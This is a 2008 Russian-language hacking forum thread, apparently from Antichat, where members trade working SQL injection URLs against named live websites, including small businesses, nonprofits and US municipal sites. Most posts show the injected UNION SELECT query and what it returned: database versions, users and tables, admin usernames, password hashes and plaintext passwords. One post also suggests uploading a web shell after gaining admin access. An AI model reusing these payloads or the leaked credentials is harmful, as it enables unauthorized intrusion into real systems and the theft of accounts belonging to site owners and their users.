SQL Инъекции

USAkid · 7 Sep 2008

http://www.irvconsulex.cz/
Code:
http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 4.1.18-log
user() - irvconsulex-cz@localhost
database() - logirvconsulex-cz

Админ:
Code:
http://www.irvconsulex.cz/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password)+from+jos_users+limit+0,1--
login/hash/salt:

admin : 506e5a43e1ed6052fc003c157483b73d : IUsUB8uMKz7Qt2wJ

DimOnOID · 7 Sep 2008

Code:

http://www.cm-lousa.pt/servicos/news.php?id=99999+union+select+1,concat_ws(0x40,host,user,password,file_priv,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*

Fugitif · 7 Sep 2008

Code:
http://www.wtopnews.com/index.php?nid=25&sid=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
5.0.32-Debian_7etch5-log:dc_inform:[email protected]
Click to expand...
Code:
http://www.lam.org/news/article.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
4.0.26-standard-log:lam:[email protected]
Click to expand...

[Dezzter] · 7 Sep 2008

http://www.tricitysra.org/display?help=Information&topic='+union+select+1,2,3,4,5,6,7,8,9,0,1,concat( version(),char(58),database(),char(58),user()),3,4 ,5/*
Click to expand...

5.0.45:tri:tri@localhost

N1K70 · 8 Sep 2008

Proover.Com

Code:

http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--

=\\\

USAkid · 8 Sep 2008

N1K70 said:
Proover.Com
Code:
http://proover.com/search_results.php?cid=-1/**/union/**/select/**/1,user(),3,4,5,6--
=\\\
Click to expand...
Интересно по нему лазить, раскрутил бы дальше

Версия > 5 => узнаем пасс легко.
Code:
http://proover.com/search_results.php?cid=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=0x457368705f6d656d62657273--
Тэкс, Es_pwd и admin_name то, что нас интересует.
Code:
http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_admin_name,0x3a,es_pwd)3,4,5,6+from+eshp_admin--
Получаем Admin:A

Полезли в мемберс:
Code:
http://proover.com/search_results.php?cid=-1+union+select+1,concat_ws(es_username,0x3a,es_password),3,4,5,6+from+eshp_members+limit+2,1--
И вот пошли логины с пассами.
Пассы открытые

Cennarios · 8 Sep 2008

http://www.scooter-center.ru/detail/?id=-1+union+select+concat(0x3a3a,login,0x3a3a,password,0x3a3a),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+cmf3_sc.bof_users+limit+0,1/*

login: wolf pass: 123
--------------------------------------------------

http://www.travelnetcuba.it/hotels.php?id_hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(table_name,0x3a3a,table_schema),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+information_schema.tables+limit+37,1/*

login: lorenzo
pass: 883777
--------------------------------------------

http://www.ipiccolissimi.it/root/catalogo.php?cat=1&tipologia=1&idMacro=37&idMicro=-1+union+select+1,concat(0x3a3a,login,0x3a3a,password)+from+utenti+limit+0,1/*
login: ipiccolissimi
pass: natura06thamm04

---------------------------------------------

USAkid · 8 Sep 2008

.us
Code:
http://www.turkuaz.us/content.php?magId=-25+union+select+1,2,3,4,concat_ws(version(),0x3a,user(),0x3a,database()),6,7--
version() - :4.1.22
user() - [email protected]
database() - turkuazus

USAkid · 8 Sep 2008

http://laneuse.ci.minneapolis.mn.us
Code:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(version(),0x3a,user(),0x3a,database()),2,3,4,5--
version() - 5.0.58
user() - traffic7@localhost
database() - tmo

До пасса добраться удалось, он в открытом виде:
Code:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=1+union+select+concat_ws(login,0x3a,password),2,3,4,5+from+users+limit+0,1--
Login/password:

jason / bond007 (пасс улыбнул)...

--------------------------------------------------------------------
Еще чуть-чуть (тож .us):
http://mobile.sugarcube.us
Code:
http://mobile.sugarcube.us/details.php?id=-1+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11--
version() - 4.0.27-max-log
user() - [email protected]
database() - newvintage

USAkid · 8 Sep 2008

И еще немного .us

http://www.ultrashine.us
Code:
http://www.ultrashine.us/product_item.php?cat=&item=-7+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14--
version() - 4.0.27-max-log
user() - [email protected]
database() - db206430733

--------------------------------------------------------------------

http://www2.ci.poway.ca.us/
Code:
http://www2.ci.poway.ca.us/pcpa/pcpadetail.php?eventid=176+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13--
version() - 5.0.60-log
user() - powaycity@localhost
database() - powaycity

MirA · 8 Sep 2008

http://www.uniprod.ru

алкошоп)

version() = 4.1.22
user() = uniprod@localhost
database() = wwwuniprodru

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,version(),user(),database())/*

есть табличка fs_users с полями:
uname
passwd
uid
email

вот конечный запрос,пассы в md5, но в основном есть в он-лайн базах...

http://www.uniprod.ru/mods.php?name=shop&action=goodsinfo&id=-272+union+select+1,2,3,4,concat_ws(0x3a3a3a,uname,email,passwd)+from+fs_users+limit+0,1/*

Pashkela · 9 Sep 2008

USAkid said:
Наконец-то вернулся домой, отдохнул прекрасно. Тэкс, теперь за дело:

mobilgamez.ru
Code:
http://mobilgamez.ru/ctlg.php?xn=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(version(),0x3a,user(),0x3a,database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--
version() - 5.0.22
user() - [email protected]
database() - admin_mobilgamez

Вывод производится в title.

Сервер:
nginx/0.6.31

Админка какая-то странная, по идее тут:
http://mobilgamez.ru/admin , ввел наугад логин/пароль admin/admin ... Подойти вроде подошло, но ошибку 500 показало... Вот так вотЪ
Click to expand...
Данные по полям user,password из таблицы admin_packer.admin_users:
-------
kosty:*CAA6A6EB56FA8757200E1BA2FAD09CD01220317A
lena:*348D2F9427DAD0C3D0EDBE03182DA2FB9E4C5DBF

winstrool · 9 Sep 2008

http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+concat_ws(0x3a,id,user_name,user_pass,user_mail,user_icq)+from+itaf_user+limit+0,1/*

$n@ke · 9 Sep 2008

http://www.knockers.org.uk/players.php?id=118+order+by+8--
Click to expand...

Dbname:mycricket
Version:5.0.51a-community-log
User:[email protected]

members:
lynden:allen
Click to expand...

========================================

http://www.sherlock-holmes.org.uk/event_info.php?id=141|SQL
Click to expand...

DBname:sherlock_holmes
Version:4.1.22-standard
User:sherlock_general@localhost

Twoster · 10 Sep 2008

http://www.aavba.org/

Скуль:

http://www.aavba.org/articles.php?Id=-1+union+select+1,USERNAME,password,4,5,6,7+from+users+limit+1,1/*
Click to expand...

Логин: VBSLLC
хеш: 5b5f366f63b42b17
Расшифровка хеша: noodles1

user() - aavba@localhost
version() - 5.0.22
database() - aavba
Click to expand...

В админке есть какая то биллинг панель, на счету 99 $, также на сколько я понял сайт

http://virtualbankruptcyservices.net
Click to expand...

принадлежит этому же админу...
В общем, если кто дальше нароет, отпишитесь плиз!

И еще чуток разношерстных скулей:

http://www.sufficiencyeconomy.org/show.php?Id=-1+union+select+1,2,3,4,5,version(),7,user(),9,10,11,12,13,14,15/*
http://www.heizoel24.de/news.php?news_id=-1+union+select+1,user(),3,version(),database(),6/*
http://www.awrrtc.org/articles.php?id=-1+union+select+1,user(),version(),database(),5/*
http://www.sibezrcs.ru/articles.php?id=-1+union+select+1,user(),version(),4,database(),6,7,8,9,10,11/*
http://www.ladogorski.com/articles.php?id=-1+union+select+1,user(),version(),4,5,6,7/*
http://www.gloriahansen.com/articles.php?p=1&ID=-1+union+select+1,version(),3,user(),database(),6,7--
http://www.lynnmaloneyacupuncture.com/articles.php?ID=-1+union+select+1,2,version(),user()/*
http://www.4gr8teeth.com/articles.php?id=-1+union+select+1,user(),3,version()--
Click to expand...

$n@ke · 10 Sep 2008

http://www.sensation.org.uk/index.php?p=10
Click to expand...

Dbname: sensa_cms
Version: 4.1.22-standard
Username: sensa_website@localhost

password:username

test:[email protected]
test:[email protected]
test2:[email protected]
Click to expand...

AkyHa_MaTaTa · 10 Sep 2008

PageRank: 5 тИЦ: 110

http://www.amadeo-russia.ru/brand/?brand=-1+union+select+1,table_name,concat_ws(0x2f,version(),user(),database()),4,5,6/*
(вывод в титле)

интересные таблы:
ws_users
ws_users2
bof_users
cmf_users
chat_users
invforumapi_users
invforummeetings_user
users

админки я так и не нашел, скорее всего ее нету

Twoster · 10 Sep 2008

И еще маленько:

http://www.theallergygroup.com/articles.php?id=-1+union+select+1,user(),3,version()/*

http://www.joelegecko.com/articles.php?id=-1+union+select+1,version(),user(),4,database(),6,7,8,9,10,11,12,13/*

http://profootballfocus.com/articles.php?tab=articles&arc=&id=-1+union+select+1,admin,password,4,5,6,7+from+members--
(в поле admin выводит 0, выводит хеш пароля, но админку не нашел...)

http://www.u-coc.com/articles.php?id=-1+union+select+1,2,version(),database()/*
Click to expand...

$n@ke · 10 Sep 2008

ппц как жрать охота..вот замена небольшая))

http://euclid.hamline.edu/~arundquist/php/mysql/movies/showmovie.php?movie_id=279
Click to expand...

Name: test
Version: 4.1.22-log
Username: arundquist@localhost

ADD
============================================

http://www.celtnet.org.uk/mobile-phone/rt_readarticle.php?id=-1+union+select+username,password,3,email+from+users/*
Click to expand...

Database name: celtnet
Version: 4.1.19-standard-log
Username: celtnet@localhost

там пхпбб2 есть,но не будем тянуть хеши оттуда, так как логин и пасс покатят, и О ЧУДО, юзер окажецца админом....далее инклудим шелл и...а там кто что сможет)) при свежей BSDe (((

зы: куча команд отключена. советую попробовать include, ибо через passthru половина команд не досступна.(pwd катит).

Cennarios · 11 Sep 2008

http://taro.in.ua/index.php?page=subarticle&id=-1+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8+from+f_users/*

http://taro.in.ua/forum

login: Филиса <-модер
pass: draco

SQL Инъекции

USAkid Elder - Старейшина

DimOnOID Banned

Fugitif Elder - Старейшина

[Dezzter] Elder - Старейшина

N1K70 Banned

USAkid Elder - Старейшина

Cennarios Elder - Старейшина

USAkid Elder - Старейшина

USAkid Elder - Старейшина

USAkid Elder - Старейшина

MirA Member

Pashkela Динозавр

winstrool MasterBlind

$n@ke Elder - Старейшина

Twoster Members of Antichat

$n@ke Elder - Старейшина

AkyHa_MaTaTa Elder - Старейшина

Twoster Members of Antichat

$n@ke Elder - Старейшина

Cennarios Elder - Старейшина

Useful Searches

SQL Инъекции

USAkid Elder - Старейшина

DimOnOID Banned

Fugitif Elder - Старейшина

[Dezzter] Elder - Старейшина

N1K70 Banned

USAkid Elder - Старейшина

Cennarios Elder - Старейшина

USAkid Elder - Старейшина

USAkid Elder - Старейшина

USAkid Elder - Старейшина

MirA Member

Pashkela Динозавр

winstrool ~~*MasterBlind*~~

$n@ke Elder - Старейшина

Twoster Members of Antichat

$n@ke Elder - Старейшина

AkyHa_MaTaTa Elder - Старейшина

Twoster Members of Antichat

$n@ke Elder - Старейшина

Cennarios Elder - Старейшина

winstrool MasterBlind